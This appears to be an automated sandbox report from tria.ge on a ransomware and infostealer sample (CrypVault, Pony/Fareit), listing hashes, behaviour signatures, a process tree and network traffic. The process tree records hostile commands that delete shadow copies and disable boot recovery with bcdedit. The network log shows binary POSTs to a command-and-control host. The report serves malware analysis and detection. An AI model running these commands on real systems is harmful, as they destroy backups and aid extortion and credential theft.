Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    08/05/2021, 13:01 UTC

General

  • Target

    AADDE71205336CCDD048F0B5029BECBBCD03E741045F4.exe

  • Size

    444KB

  • MD5

    fd442753c3895d868eed72f7854e2fba

  • SHA1

    477dc12f213dd05a15b61207926b478d3a0d04c7

  • SHA256

    aadde71205336ccdd048f0b5029becbbcd03e741045f406b2fa819b909809202

  • SHA512

    1a7ff91196019abe9dfa93bfaca299ecd87693ef173560951b4d55f9d0c66355535bef724de26865205419e7638e57c762e332d7eff85187e9695f0a92e1d0c2

Malware Config

Signatures

  • CrypVault

    Ransomware family which makes encrypted files look like they have been quarantined by AV.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Executes dropped EXE 3 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\AADDE71205336CCDD048F0B5029BECBBCD03E741045F4.exe
    "C:\Users\Admin\AppData\Local\Temp\AADDE71205336CCDD048F0B5029BECBBCD03E741045F4.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo 2D4F861D8DCF8C8F
      2⤵
        PID:1704
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\CF8C8F" 7za.exe
        2⤵
          PID:608
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c echo 2D4F861D8DCF8C8F
          2⤵
            PID:1652
          • C:\Users\Admin\AppData\Local\Temp\7za.exe
            "C:\Users\Admin\AppData\Local\Temp\7za.exe" e "C:\Users\Admin\AppData\Local\Temp\2D4F861D8D" -y -p2D4F861D8D
            2⤵
            • Executes dropped EXE
            PID:1688
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c echo 2D4F861D8DCF8C8F
            2⤵
              PID:1312
            • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
              "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2D4F861D8D.doc"
              2⤵
              • Drops file in Windows directory
              • Modifies Internet Explorer settings
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of SetWindowsHookEx
              PID:384
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c echo 2D4F861D8DCF8C8F
              2⤵
                PID:616
              • C:\Users\Admin\AppData\Local\Temp\2D4F861D8D.exe
                "C:\Users\Admin\AppData\Local\Temp\2D4F861D8D.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:1476
                • C:\Users\Admin\AppData\Local\Temp\2D4F861D8D.exe
                  "C:\Users\Admin\AppData\Local\Temp\2D4F861D8D.exe"
                  3⤵
                  • Executes dropped EXE
                  • Drops startup file
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1728
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\VAULT.hta"
                    4⤵
                    • Modifies Internet Explorer settings
                    PID:1592
                  • C:\Windows\SysWOW64\wbem\WMIC.exe
                    "C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:324
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c echo 2D4F861D8DCF8C8F
                2⤵
                  PID:816
              • C:\Windows\system32\cmd.exe
                cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:1080
                • C:\Windows\system32\vssadmin.exe
                  vssadmin.exe delete shadows /all /quiet
                  2⤵
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Interacts with shadow copies
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:1476
                • C:\Windows\system32\bcdedit.exe
                  bcdedit.exe /set {default} recoveryenabled no
                  2⤵
                  • Modifies boot configuration data using bcdedit
                  PID:988
                • C:\Windows\system32\bcdedit.exe
                  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                  2⤵
                  • Modifies boot configuration data using bcdedit
                  PID:212
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1328

              Network

              • flag-unknown
                DNS
                oknoff52.ru
                2D4F861D8D.exe
                Remote address:
                8.8.8.8:53
                Request
                oknoff52.ru
                IN A
                Response
                oknoff52.ru
                IN A
                87.236.16.148
              • flag-unknown
                POST
                http://oknoff52.ru/api/
                2D4F861D8D.exe
                Remote address:
                87.236.16.148:80
                Request
                POST /api/ HTTP/1.0
                Host: oknoff52.ru
                Accept: */*
                Accept-Encoding: identity, *;q=0
                Accept-Language: en-US
                Content-Length: 328
                Content-Type: application/octet-stream
                Connection: close
                Content-Encoding: binary
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                Response
                HTTP/1.1 404 Not Found
                Server: nginx-reuseport/1.13.4
                Date: Sat, 08 May 2021 13:01:35 GMT
                Content-Type: text/html; charset=iso-8859-1
                Content-Length: 277
                Connection: close
                Vary: Accept-Encoding
              • flag-unknown
                POST
                http://oknoff52.ru/api/
                2D4F861D8D.exe
                Remote address:
                87.236.16.148:80
                Request
                POST /api/ HTTP/1.0
                Host: oknoff52.ru
                Accept: */*
                Accept-Encoding: identity, *;q=0
                Accept-Language: en-US
                Content-Length: 328
                Content-Type: application/octet-stream
                Connection: close
                Content-Encoding: binary
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                Response
                HTTP/1.1 404 Not Found
                Server: nginx-reuseport/1.13.4
                Date: Sat, 08 May 2021 13:01:40 GMT
                Content-Type: text/html; charset=iso-8859-1
                Content-Length: 277
                Connection: close
                Vary: Accept-Encoding
              • flag-unknown
                POST
                http://oknoff52.ru/api/
                2D4F861D8D.exe
                Remote address:
                87.236.16.148:80
                Request
                POST /api/ HTTP/1.0
                Host: oknoff52.ru
                Accept: */*
                Accept-Encoding: identity, *;q=0
                Accept-Language: en-US
                Content-Length: 328
                Content-Type: application/octet-stream
                Connection: close
                Content-Encoding: binary
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                Response
                HTTP/1.1 404 Not Found
                Server: nginx-reuseport/1.13.4
                Date: Sat, 08 May 2021 13:01:46 GMT
                Content-Type: text/html; charset=iso-8859-1
                Content-Length: 277
                Connection: close
                Vary: Accept-Encoding
              • flag-unknown
                POST
                http://oknoff52.ru/api/
                2D4F861D8D.exe
                Remote address:
                87.236.16.148:80
                Request
                POST /api/ HTTP/1.0
                Host: oknoff52.ru
                Accept: */*
                Accept-Encoding: identity, *;q=0
                Accept-Language: en-US
                Content-Length: 328
                Content-Type: application/octet-stream
                Connection: close
                Content-Encoding: binary
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                Response
                HTTP/1.1 404 Not Found
                Server: nginx-reuseport/1.13.4
                Date: Sat, 08 May 2021 13:01:51 GMT
                Content-Type: text/html; charset=iso-8859-1
                Content-Length: 277
                Connection: close
                Vary: Accept-Encoding
              • 87.236.16.148:80
                http://oknoff52.ru/api/
                http
                2D4F861D8D.exe
                1.0kB
                732 B
                6
                6

                HTTP Request

                POST http://oknoff52.ru/api/

                HTTP Response

                404
              • 87.236.16.148:80
                http://oknoff52.ru/api/
                http
                2D4F861D8D.exe
                1.0kB
                732 B
                6
                6

                HTTP Request

                POST http://oknoff52.ru/api/

                HTTP Response

                404
              • 87.236.16.148:80
                http://oknoff52.ru/api/
                http
                2D4F861D8D.exe
                1.0kB
                732 B
                6
                6

                HTTP Request

                POST http://oknoff52.ru/api/

                HTTP Response

                404
              • 87.236.16.148:80
                http://oknoff52.ru/api/
                http
                2D4F861D8D.exe
                1.0kB
                732 B
                6
                6

                HTTP Request

                POST http://oknoff52.ru/api/

                HTTP Response

                404
              • 8.8.8.8:53
                oknoff52.ru
                dns
                2D4F861D8D.exe
                57 B
                73 B
                1
                1

                DNS Request

                oknoff52.ru

                DNS Response

                87.236.16.148

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/384-78-0x00000000716F1000-0x00000000716F4000-memory.dmp

                Filesize

                12KB

              • memory/384-79-0x000000006F171000-0x000000006F173000-memory.dmp

                Filesize

                8KB

              • memory/384-80-0x000000005FFF0000-0x0000000060000000-memory.dmp

                Filesize

                64KB

              • memory/1088-59-0x0000000075281000-0x0000000075283000-memory.dmp

                Filesize

                8KB

              • memory/1476-88-0x0000000000380000-0x0000000000385000-memory.dmp

                Filesize

                20KB

              • memory/1728-89-0x0000000000400000-0x000000000041A000-memory.dmp

                Filesize

                104KB

              • memory/1728-84-0x0000000000400000-0x0000000000E28000-memory.dmp

                Filesize

                10.2MB

              We care about your privacy.

              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.